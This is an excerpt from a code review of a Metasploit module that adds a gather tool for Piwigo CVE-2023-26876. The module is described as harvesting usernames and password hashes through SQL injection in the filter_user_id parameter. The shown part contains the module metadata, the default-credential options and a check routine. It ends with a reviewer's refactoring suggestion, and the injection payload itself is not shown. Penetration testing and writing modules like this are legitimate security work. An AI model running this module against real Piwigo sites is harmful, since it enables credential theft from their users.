modules/auxiliary/gather/piwigo_cve_2023_26876.rb

```diff
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::SQLi
+  require 'metasploit/framework/hashes'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Piwigo CVE-2023-26876 Gather Credentials via SQL Injection ',
+        'Description' => %q{
+          This module allows an authenticated user to retrieve the usernames and encrypted passwords of other users in Piwigo through SQL injection using the (filter_user_id) parameter.
+        },
+        'Author' => [
+          'rodnt'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2023-26876' ],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-26876'],
+          ['Discover', 'Rodolfo Tavares'],
+          ['Thanks', 'Tempest Security', 'Henrique Arcoverde']
+
+        ],
+        'DisclosureData' => '2023-04-21',
+        'Platform' => 'ruby',
+        'Arch' => ARCH_RUBY,
+        'Privileged' => true,
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['REPEATABLE_SESSION'],
+          'SideEffects' => ['IOC_IN_LOGS']
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The base path to Piwigo', '/' ]),
+        OptString.new('USERNAME', [ true, 'The username for authenticating to Piwigo', 'piwigo' ]),
+        OptString.new('PASSWORD', [ true, 'The password for authenticating to Piwigo', 'piwigo' ])
+      ]
+    )
+  end
+
+  def check
+    login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'uri' => normalize_uri(login_page)
+    )
+
+    if res && res.code == 200
+      return res
+    else
+      print_error('[!] could not find any piwigo instance')
+    end
```

Comment:
```suggestion
   print_error('[!] could not find any piwigo instance') unless res && res.code == 200
```
You're returning `res` regardless, so no need to have a branch do it beforehand.